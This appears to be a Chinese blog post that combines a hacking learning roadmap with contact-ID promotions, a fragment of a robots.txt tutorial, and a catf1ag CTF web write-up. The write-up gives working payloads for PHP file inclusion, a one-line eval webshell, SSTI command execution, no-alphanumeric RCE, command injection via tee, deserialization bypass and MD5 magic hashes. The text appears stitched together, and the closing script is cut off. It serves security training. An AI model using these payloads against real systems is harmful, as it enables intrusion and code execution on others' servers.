如何自学黑客&网络安全
黑客零基础入门学习路线&规划
初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。
8、超级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的
视频配套资料&国内外网安书籍、文档&工具
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一些笔者自己买的、其他平台白嫖不到的视频教程。
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Disallow: /admin/ 后台管理文件
Disallow: /require/ 程序文件
Disallow: /attachment/ 附件
Disallow: /images/ 图片
Disallow: /data/ 数据库文件
Disallow: /template/ 模板文件
Disallow: /css/ 样式表文件
Disallow: /lang/ 编码文件
Disallow: /script/ 脚本文件
robots.txt文件里还可以直接包括在sitemap文件的链接。就像这样:
Sitemap: http://www.***.com/sitemap.xml
robots.txt语法教程
用几个最常见的情况,直接举例说明:
- 允许所有SE收录本站:robots.txt为空就可以,什么都不要写。
- 禁止所有SE收录网站的某些目录:
User-agent: *
Disallow: /目录名1/
Disallow: /目录名2/
Disallow: /目录名3/
- 禁止某个SE收录本站,例如禁止百度:
User-agent: Baiduspider
Disallow: /
- 禁止所有SE收录本站:
User-agent: *
Disallow: /
访问/f1ag_is_in_there!!!
会下载一个文件,打开即可获得flag
easy_include_1
我们看一下源代码
这里告诉我们flag在/get_flag
payload:
?file=php://filter/read=convert.base64-encode/resource=/get_flag
将红框内的字符串base64解码即可得到flag
strcmp
源代码:
<?php
error_reporting(0);
include('flag.php');
show_source("index.php");
$str = $_GET['str'];
$init_str = "get_flag";
if($str!=$init_str){
if(strcmp($init_str,$str)==0){
echo $flag;
}else{
echo "no";
}
}else{
echo "nonono";
}
?>
strcmp()函数在PHP官方手册中的描述是int strcmp ( string str1,string str2 ),需要给strcmp()传递2个string类型的参数。如果str1小于str2,返回-1,相等返回0,否则返回1。strcmp函数比较字符串的本质是将两个变量转换为ascii,然后进行减法运算,然后根据运算结果来决定返回值。
strcmp比较的是字符串类型,如果强行传入其他类型参数,会出错,出错后返回值0,正是利用这点进行绕过。
payload:
?str[]=0
easy_upload_1
文件上传
直接一句话木马
<?php
@eval($_POST('1'));
?>
然后直接蚁剑连接即可
easy_include_2
一打开很抽象
查看源代码
可惜想简单了,这不是flag
这里提示了file传参
因为是文件包含题
所以我们直接按套路走
?file=php://filter/read=convert.base64-encode/resource=flag.php
这里提示不用加php后缀
?file=php://filter/read=convert.base64-encode/resource=flag
接下来base64解码即可
注意:这里要将catf1ag改为flag才能提交成功
swp
这里提示了swp
linux下vi/vim异常关闭是会存留.swp文件
方法:提示vim异常关闭,访问url/.index.php.swp,得到flag。
访问.index.php.swp会获得一个文件,打开后即可拿到flag
被黑了…
查看源代码
访问webshe11.php
打开是个空白页,猜测是一句话木马
这里有个难点就是要猜hacker为传参
?hacker=system('ls');
接下来就是直接查看flag
?hacker=system('cat hacker_flag.php');
easy_rce_2
源代码:
<?php
error_reporting(0);
show_source('index.php');
$cmd = $_GET['cmd'];
$preg = preg_match('/system|exec|shell_exec|`|popen/',$cmd);
if(!$preg){
eval($cmd);
}else{
echo "非法字符";
}
?>
这里我们使用拼接绕过
?cmd=eval($_GET[1]);&1=system('ls');
?cmd=eval($_GET[1]);&1=system('cat f1ag_in_there.php');
不等于0
数组绕过秒了
?num[]=0
easy_flask_1
题目有提示/?cmd=
我们先尝试一下
接下来我们猜测可能为ssti
?cmd={{2*2}}
既然知道是ssti
我们直接查询配置信息,看有没有什么发现
?cmd={{config}}
easy_flask_2
跟上一题一样,我们先测试一下它是否为ssti
这里直接给一个比较通用的payload:
?cmd={% set chr=().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(250).__init__.__globals__.__builtins__.chr %}{{().__class__.__bases__[0].__subclasses__()[250].__init__.__globals__.os.popen(chr(108)%2bchr(115)).read()}}
这里的chr(108)%2bchr(115)为ls拼接
可以参考下这个表
chr()表对应大全_chr(12)-CSDN博客表对应大全_chr(12)-CSDN博客")
接下来就是cat flag了
?cmd={% set chr=().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(250).__init__.__globals__.__builtins__.chr %}{{().__class__.__bases__[0].__subclasses__()[250].__init__.__globals__.os.popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(102)%2bchr(42)).read()}}
这里使用的是cat f*(后面不想找了…)
又双叒叕不能相等
源代码:
<?php
include('flag.php');
error_reporting(0);
show_source('index.php');
$init_num = '999999999999';
$user_num = $_GET['num'];
if(isset($user_num)){
if($user_num != $init_num){
if(strlen($user_num) < strlen($init_num)){
if($user_num > $init_num){
echo 'get glag:'.$flag;
}else{
echo '你输入的数字小于初始值~';
}
}else{
echo '不能大于初始值~';
}
}else{
echo '不能相等~';
}
}else{
echo '请输入内容~';
}
?>
这里要求num长度小于999999999999又要大于999999999999
提示:字符串开头以xex开头,x代表数字。会被转换成科学计数法(注意一定要是0e/d+的模式)。
payload:
?num=1e12
这里没有发现flag,真奇怪
flag藏在响应头里了,离谱
哦豁~还有一半呢?
打开一片空白
查看源代码
这里显示flagb,说明还有个flaga应该
查看响应头
接下来就是拼接,base64解码即可
bypass_wakeup
源代码:
<?php
show_source(__FILE__);
class flag{
public $name = "catflag";
public function __wakeup(){
echo "this is __wakeup<br>";
}
public function __destruct(){
show_source('flag.php');
echo "this is __destruct<br>";
}
}
$str = $_GET["ser"];
@$un_str = unserialize($str);
echo $un_str->name."<br>";
?>
这题是反序列化
比较简单,只要绕过__wakeup即可
序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行
<?php
show_source(__FILE__);
class flag{
public $name = "catflag";
public function __wakeup(){
echo "this is __wakeup<br>";
}
public function __destruct(){
show_source('flag.php');
echo "this is __destruct<br>";
}
}
$a=new flag();
echo serialize($a);
//O:4:"flag":1:{s:4:"name";s:7:"catflag";}
修改为
?ser=O:4:"flag":2:{s:4:"name";s:7:"catflag";}
无字符webshell
源代码:
<?php
$cmd=$_GET['cmd'];
if(preg_match("/[A-Za-z0-9]/",$cmd)){
die("giaogiaogiao!!!");
}
else {
eval($cmd);
}
highlight_file(__FILE__)
?>
这里要绕过字母和数字
异或绕过有点麻烦,这里看别的师傅写的
想学习的可以参考一下这个文章浅析CTF绕过字符数字构造shell_ctf 只能字母或者数字登录-CSDN博客
?cmd=?><?=`{${~"%a0%b8%ba%ab"}[%a0]}`?>&%a0=ls /
分析下这个Payload,?>闭合了eval自带的<?标签。接下来使用了短标签。{}包含的PHP代码可以被执行,~“%a0%b8%ba%ab"为”_GET",通过反引号进行shell命令执行。最后我们只要GET传参%a0即可执行命令。
接下来就是cat /flag.txt
?cmd=?><?=`{${~"%a0%b8%ba%ab"}[%a0]}`?>&%a0=cat /flag.txt
舔dog日记
(听哥一句劝,别当舔dog,不喜欢就是不喜欢)
我们先打开日记1看看
这里有filename,盲猜后面是base64编码后的
我们尝试一下flag.php
?filename=ZmxhZy5waHA=
查看源代码即可发现flag
遍历遍历
这里刷新一次就有一句话,应该是要我们写脚本遍历
脚本
import requests
url = "http://subject.catf1ag.cn:47522/" #这里填入题目的url
for i in range(250):
result = requests.get(url)
if 'catf1ag' in result.text:
print(result.text)
break
这里需要等几秒才能显示
easy_rce_3
源代码:
<?php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){
if(!preg_match('/php:\/\/|data:\/\/|phar:\/\/|phpinfo()|info|flag|rm|\/|echo|\.|\*|\?/i',$_GET['cmd'])){
@eval($_GET['cmd']);
}else{
echo "danger_string";
}
}else{
echo "你啥也不输入,给你个假的flag:flag{error_flag}";
}
?>
这题没有过滤system
?cmd=system('ls');
这里利用文件包含伪协议
?cmd=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=flag.php
base64解码即可
easy_rce_4
源代码:
<?php
error_reporting(0);
show_source('index.php');
$cmd = $_GET['a'];
$a = '/flag|cat|tac|more|less|[ |<>|?|*|\\\\\'"]/';
if(preg_match($a,$cmd)){
echo "not allow";
}
else{
if(strlen($cmd)<=50&$cmd!=''){
echo "you are success!";
}
else{
system($cmd);
}
}
?>
即有过滤,又加了长度限制
这里可以使用nl或者tail
因为这里过滤了空格,可以使用%0a或者%09还有{IFS}等绕过(这里%0a不行)
?a=%ls;6666666666666666666666666666666666666666666666666666666666666
?a=nl%09f1111111111111111111111111ag.php;6666666666666666666666666666666666666666666666666666666666666
flag藏在源代码里面
xss_alert
开始试了很多xss,发现没反应
看了下源代码,发现只要触发alert即可
接下来base64解码即可
[两小时AK赛] 你猜猜是什么注入
开始以为是ssti
看了别的师傅提示tee
tee的功能是从标准输入读取,再写入标准输出和文件。
?catf1ag=ls / | tee 2.txt
简单解释一下,就是将ls /写入2.txt里
然后访问2.txt就会触发ls /
?catf1ag=cat /flag | tee 3.txt
json_2
源代码:
<?php
show_source(__FILE__);
$strs = json_decode($_GET['strs']);
$key = '************************';
$flag = 'catf1ag{***********************************}';
foreach($strs as $keys=>$values){
if($values == $key){
echo $flag;
}else{
echo 'failed';
}
}
?>
这题跟前面那一题有点不一样
这里key为纯数字或者数字开头的字符串
所以这里改为布尔值true(布尔值可以和任何字符串相等。)
?strs={"key":true}
MD5弱比较
源代码:
<?php
header("Content-Type:text/html;charset=utf-8");
show_source(__FILE__);
include('flag.php');
$username = $_GET['username'];
$password = $_GET['password'];
if($username != $password){
if(md5($username) == md5($password)){
echo 'GET_FLAG:'.$flag;
}else{
echo 'md5校验出错...';
}
}else{
echo '用户名密码不能相等!';
}
?>
这里简单讲解下弱比较
“= =”:会把两端变量类型转换成相同的,在进行比较。
这里明确说明,在两个相等的符号中,一个字符串与一个数字相比较时,字符串会转换成数值。
例子:
<?php
var_dump("name"==0); //true
var_dump("1name"==1); //true
var_dump("name1"==1) //false
var_dump("name1"==0) //true
var_dump("0e123456"=="0e4456789"); //true
var_dump("0e1abc"=="0"); //true
?>
当出现xex模式的时候代表科学计数法,比如1e3=1*10三次方,在进行比较运算时,如果遇到了0e\d+(意思就是0e就是0e,d+的意思是后面全部是数字)这种字符串,就会将这种字符串解析为科学计数法。所以上面例子中2个数的值都是0因而就相等了。如果不满足0e\d+这种模式就不会相等。
下面提供一下md加密后0e开头的
纯数字类:
240610708 0e462097431906509019562988736854
314282422 0e990995504821699494520356953734
571579406 0e972379832854295224118025748221
903251147 0e174510503823932942361353209384
1110242161 0e435874558488625891324861198103
1320830526 0e912095958985483346995414060832
1586264293 0e622743671155995737639662718498
2302756269 0e250566888497473798724426794462
2427435592 0e067696952328669732475498472343
2653531602 0e877487522341544758028810610885
3293867441 0e471001201303602543921144570260
3295421201 0e703870333002232681239618856220
3465814713 0e258631645650999664521705537122
3524854780 0e507419062489887827087815735195
3908336290 0e807624498959190415881248245271
4011627063 0e485805687034439905938362701775
4775635065 0e998212089946640967599450361168
4790555361 0e643442214660994430134492464512
5432453531 0e512318699085881630861890526097
5579679820 0e877622011730221803461740184915
5585393579 0e664357355382305805992765337023
6376552501 0e165886706997482187870215578015
7124129977 0e500007361044747804682122060876
7197546197 0e915188576072469101457315675502
7656486157 0e451569119711843337267091732412
大写字母类:
QLTHNDT 0e405967825401955372549139051580
QNKCDZO 0e830400451993494058024219903391
EEIZDOI 0e782601363539291779881938479162
TUFEPMC 0e839407194569345277863905212547
UTIPEZQ 0e382098788231234954670291303879
UYXFLOI 0e552539585246568817348686838809
IHKFRNS 0e256160682445802696926137988570
PJNPDWY 0e291529052894702774557631701704
ABJIHVY 0e755264355178451322893275696586
DQWRASX 0e742373665639232907775599582643
DYAXWCA 0e424759758842488633464374063001
GEGHBXL 0e248776895502908863709684713578
GGHMVOE 0e362766013028313274586933780773
GZECLQZ 0e537612333747236407713628225676
NWWKITQ 0e763082070976038347657360817689
NOOPCJF 0e818888003657176127862245791911
MAUXXQC 0e478478466848439040434801845361
MMHUWUV 0e701732711630150438129209816536
payload:
?username=240610708&password=QLTHNDT
MD5强对比
源代码:
<?php
header("Content-Type:text/html;charset=utf-8");
show_source(__FILE__);
include('flag.php');
$username = $_GET['username'];
$password = $_GET['password'];
if($username != $password){
if(md5($username) === md5($password)){
echo 'GET_FLAG:'.$flag;
}else{
echo 'md5校验出错...';
}
}else{
echo '用户名密码不能相等!';
}
?>
这里使用了===强比较
直接构造数组就可以绕过了
payload:
?username[]=1&password[]=2
md5($md5)
源代码:
<?php
header("Content-Type:text/html;charset=utf-8");
show_source(__FILE__);
include('flag.php');
$md5 = $_GET['md5'];
if($md5 == md5($md5)){
echo 'GET_FLAG'.$flag;
}else{
echo 'md5校验失败...';
}
?>
一般的md5绕过是传入0e开头的md5值,因为在弱比较时,弱比较中会截取一个字符串的数字,知道遇到字符截止,对于0e+数字的值只会截取e之前的0,所以这里即便是令传入的md5值等于$md5后还需要等于其自身进行md5的值,我们选取0e或者加密后仍为0e开头的数就行例如:0e215962017 、以及这些纯字符串转化后为0e+数字的数:QNKCDZO、s878926199a
payload:
?md5=0e215962017
[原九小时AK赛] passwd
题目描述:
小cat是某公司的安全侦察人员,在2022年9月9日凌晨6点,
小cat抓取到了几条疑似a人员和b人员交流的包,
经过破译,大致意思是“在今年xx月xx日xx点xx分准时进行数据交易”,
但是唯独不能完全破解出来,于是他发到公司的网络安全群寻求帮助:
69d00d9bc39e01687abf84e98e27c889cf1442b53edba27d3235acbeb7b0ae95
(密文格式是:年份必须是4位数,月日时分必须是两位数,需要用0补齐,比如2022年01月01日01时01分
看着像是密码的题,不知道为什么跑web来了
不出意外是sha256
题目有提示2022年并且为12位密码
所以编写python脚本
from hashlib import sha256
for i in range(202210000000,202212320000):
a='69d00d9bc39e01687abf84e98e27c889cf1442b53edba27d3235acbeb7b0ae95'
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
扫一扫
731
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
